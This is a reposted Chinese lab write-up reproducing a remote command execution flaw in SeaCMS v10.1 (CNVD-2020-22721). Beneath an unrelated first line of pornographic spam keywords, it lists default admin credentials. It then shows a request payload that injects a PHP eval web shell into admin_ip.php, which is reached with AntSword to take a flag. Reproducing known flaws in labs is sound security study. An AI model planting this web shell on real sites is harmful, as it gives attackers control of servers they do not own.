国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

漏洞復(fù)現(xiàn)-SeaCMS_v10.1_遠(yuǎn)程命令執(zhí)行(CNVD-2020-22721)

這篇具有很好參考價(jià)值的文章主要介紹了漏洞復(fù)現(xiàn)-SeaCMS_v10.1_遠(yuǎn)程命令執(zhí)行(CNVD-2020-22721)。希望對大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

SeaCMS_v10.1_遠(yuǎn)程命令執(zhí)行(CNVD-2020-22721)

漏洞信息

  • seacms_v10.1有效
  • cnvd-2020-22721
  • 命令執(zhí)行漏洞

描述

海洋CMS一套程序自適應(yīng)電腦、手機(jī)、平板、APP多個(gè)終端入口。 SeaCMS v10.1存在命令執(zhí)行漏洞,在w1aqhp/admin_ip.php下第五行使用set參數(shù),對用戶輸入沒有進(jìn)行任何處理,直接寫入文件。攻擊者可利用該漏洞執(zhí)行惡意代碼,獲取服務(wù)器權(quán)限。 后臺路徑:/manager 后臺密碼:admin:admin

前提

  • volfucs靶場復(fù)現(xiàn)

  • 可以進(jìn)入后臺

復(fù)現(xiàn)過程

登錄進(jìn)入首頁

漏洞復(fù)現(xiàn)-SeaCMS_v10.1_遠(yuǎn)程命令執(zhí)行(CNVD-2020-22721),漏洞復(fù)現(xiàn),網(wǎng)絡(luò)安全,web安全,安全,安全威脅分析,系統(tǒng)安全,運(yùn)維

按照如圖順序訪問,點(diǎn)擊確認(rèn)時(shí)抓包

漏洞復(fù)現(xiàn)-SeaCMS_v10.1_遠(yuǎn)程命令執(zhí)行(CNVD-2020-22721),漏洞復(fù)現(xiàn),網(wǎng)絡(luò)安全,web安全,安全,安全威脅分析,系統(tǒng)安全,運(yùn)維

修改內(nèi)容

v=0&ip=127.0.0.1";eval($_POST[999]);//

漏洞復(fù)現(xiàn)-SeaCMS_v10.1_遠(yuǎn)程命令執(zhí)行(CNVD-2020-22721),漏洞復(fù)現(xiàn),網(wǎng)絡(luò)安全,web安全,安全,安全威脅分析,系統(tǒng)安全,運(yùn)維

網(wǎng)頁回顯正常沒有報(bào)錯(cuò)

漏洞復(fù)現(xiàn)-SeaCMS_v10.1_遠(yuǎn)程命令執(zhí)行(CNVD-2020-22721),漏洞復(fù)現(xiàn),網(wǎng)絡(luò)安全,web安全,安全,安全威脅分析,系統(tǒng)安全,運(yùn)維

嘗試蟻劍連接

ip安全設(shè)置選項(xiàng)位置為admin_ip.php

訪問也正常

漏洞復(fù)現(xiàn)-SeaCMS_v10.1_遠(yuǎn)程命令執(zhí)行(CNVD-2020-22721),漏洞復(fù)現(xiàn),網(wǎng)絡(luò)安全,web安全,安全,安全威脅分析,系統(tǒng)安全,運(yùn)維

嘗試蟻劍連接該位置

漏洞復(fù)現(xiàn)-SeaCMS_v10.1_遠(yuǎn)程命令執(zhí)行(CNVD-2020-22721),漏洞復(fù)現(xiàn),網(wǎng)絡(luò)安全,web安全,安全,安全威脅分析,系統(tǒng)安全,運(yùn)維

成功獲取flag

漏洞復(fù)現(xiàn)-SeaCMS_v10.1_遠(yuǎn)程命令執(zhí)行(CNVD-2020-22721),漏洞復(fù)現(xiàn),網(wǎng)絡(luò)安全,web安全,安全,安全威脅分析,系統(tǒng)安全,運(yùn)維文章來源地址http://www.zghlxwxcb.cn/news/detail-718483.html

到了這里,關(guān)于漏洞復(fù)現(xiàn)-SeaCMS_v10.1_遠(yuǎn)程命令執(zhí)行(CNVD-2020-22721)的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • xxl-job遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)

    xxl-job遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)

    XXL-JOB是一個(gè)分布式任務(wù)調(diào)度平臺,其核心設(shè)計(jì)目標(biāo)是開發(fā)迅速、學(xué)習(xí)簡單、輕量級、易擴(kuò)展。現(xiàn)已開放源代碼并接入多家公司線上產(chǎn)品線,開箱即用。XXL-JOB分為admin和executor兩端,前者為后臺管理頁面,后者是任務(wù)執(zhí)行的客戶端。executor默認(rèn)沒有配置認(rèn)證,未授權(quán)的攻擊者可

    2024年02月11日
    瀏覽(16)
  • CVE-2021-22205 GitLab 遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)

    CVE-2021-22205 GitLab 遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)

    目錄 一、漏洞信息 二、環(huán)境搭建 三、復(fù)現(xiàn)過程 1.測試漏洞 2.漏洞利用,反彈shell 四、修復(fù)建議 一、漏洞信息 漏洞名稱 GITLAB 遠(yuǎn)程命令執(zhí)行漏洞 漏洞編號 CVE-2021-22205 危害等級 高危 CVSS評分 6.5 漏洞廠商 Ruby 受影響版本 11.9 = Gitlab CE/EE 13.8.8;13.9 = Gitlab CE/EE 13.9.6;13.10 = Gitlab

    2024年02月05日
    瀏覽(26)
  • 【漏洞復(fù)現(xiàn)】廈門才茂通信網(wǎng)關(guān)formping遠(yuǎn)程命令執(zhí)行漏洞

    【漏洞復(fù)現(xiàn)】廈門才茂通信網(wǎng)關(guān)formping遠(yuǎn)程命令執(zhí)行漏洞

    廈門才茂通信網(wǎng)關(guān)formping存在遠(yuǎn)程命令執(zhí)行漏洞,攻擊者可通過特定payload對目標(biāo)服務(wù)器發(fā)起攻擊,造成不可估量的影響。 請勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測試,由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失,均由使用者本人負(fù)責(zé),所

    2024年02月15日
    瀏覽(45)
  • 億賽通電子文檔安全管理系統(tǒng)遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)

    億賽通電子文檔安全管理系統(tǒng)遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)

    此文章僅用于技術(shù)交流,嚴(yán)禁用于對外發(fā)起惡意攻擊?。?! 億賽通電子文檔安全管理系統(tǒng)(簡稱:CDG)是一款電子文檔安全加密軟件,該系統(tǒng)利用驅(qū)動(dòng)層透明加密技術(shù),通過對電子文檔的加密保護(hù),防止內(nèi)部員工泄密和外部人員非法竊取企業(yè)核心重要數(shù)據(jù)資產(chǎn),對電子文檔進(jìn)

    2024年01月21日
    瀏覽(24)
  • HVV爆火漏洞:最新 WPS RCE (遠(yuǎn)程命令執(zhí)行) 復(fù)現(xiàn)

    HVV爆火漏洞:最新 WPS RCE (遠(yuǎn)程命令執(zhí)行) 復(fù)現(xiàn)

    最近HVV爆出的很火的WPS命令執(zhí)行漏洞,其實(shí)并不是0DAY,早在2019年就出現(xiàn)了,只不過最近EXP才公開。接下來我們來復(fù)現(xiàn)一遍。 WPS Office 2023 個(gè)人版 11.1.0.15120 WPS Office 2019 企業(yè)版 11.8.2.12085 wps版本: WPS V11.1.0.12300 靶機(jī): windows 10 攻擊機(jī): ubuntu 20.04 ????IP:192.168.2.103 WPS 內(nèi)置了一

    2024年02月11日
    瀏覽(23)
  • Spring Data Commons遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)(CVE-2018-1273)

    Spring Data Commons遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)(CVE-2018-1273)

    一、漏洞說明 Spring Data是一個(gè)用于簡化數(shù)據(jù)庫訪問,并支持云服務(wù)的開源框架,包含Commons、Gemfire、JPA、JDBC、MongoDB等模塊。此漏洞產(chǎn)生于Spring Data Commons組件,該組件為提供共享的基礎(chǔ)框架,適合各個(gè)子項(xiàng)目使用,支持跨數(shù)據(jù)庫持久化。 Spring Data Commons組件中存在遠(yuǎn)程代碼執(zhí)行

    2024年02月09日
    瀏覽(21)
  • 【IP-guard WebServer 遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)(0day)】

    【IP-guard WebServer 遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)(0day)】

    IP-guard是由溢信科技股份有限公司開發(fā)的一款終端安全管理軟件,旨在幫助企業(yè)保護(hù)終端設(shè)備安全、數(shù)據(jù)安全、管理網(wǎng)絡(luò)使用和簡化IT系統(tǒng)管理。 IP-guard Webserver遠(yuǎn)程命令執(zhí)行漏洞(RCE)的問題,是因?yàn)榕f版本申請審批的文件預(yù)覽功能用到了一個(gè)開源的插件 flexpaper,使用的這個(gè)

    2024年02月05日
    瀏覽(31)
  • Apache Struts2 S2-045遠(yuǎn)程命令執(zhí)行漏洞(CVE-2017-5638)復(fù)現(xiàn)

    Apache Struts2 S2-045遠(yuǎn)程命令執(zhí)行漏洞(CVE-2017-5638)復(fù)現(xiàn)

    Apache Struts2是Apache項(xiàng)目下的一個(gè)web 框架,幫助Java開發(fā)者利用J2EE來開發(fā)Web相關(guān)應(yīng)用。 Apache Struts2的Jakarta Multipart parser插件存在遠(yuǎn)程代碼執(zhí)行漏洞,攻擊者可以在使用該插件上傳文件時(shí),修改HTTP請求頭中的Content-Type值來觸發(fā)該漏洞,導(dǎo)致遠(yuǎn)程執(zhí)行代碼。 Struts 2.3.5 – Struts 2.3.3

    2024年02月15日
    瀏覽(31)
  • 思福迪Logbase運(yùn)維安全管理系統(tǒng)test_qrcode_b接口遠(yuǎn)程命令執(zhí)行漏洞漏洞復(fù)現(xiàn) [附POC]

    免責(zé)聲明:請勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測試,由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失,均由使用者本人負(fù)責(zé),所產(chǎn)生的一切不良后果與文章

    2024年01月17日
    瀏覽(28)
  • 漏洞復(fù)現(xiàn)-Drupal遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2018-7602)

    漏洞復(fù)現(xiàn)-Drupal遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2018-7602)

    Drupal 7.x 和 8.x 的多個(gè)子系統(tǒng)中存在一個(gè)遠(yuǎn)程執(zhí)行代碼漏洞。這可能允許攻擊者利用 Drupal 站點(diǎn)上的多個(gè)攻擊媒介,從而導(dǎo)致該站點(diǎn)受到威脅。此漏洞與 Drupal 核心 - 高度關(guān)鍵 - 遠(yuǎn)程代碼執(zhí)行 - SA-CORE-2018-002 有關(guān)。SA-CORE-2018-002 和此漏洞都在野外被利用。 -c 后面接命令,緊隨賬號

    2024年02月16日
    瀏覽(23)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包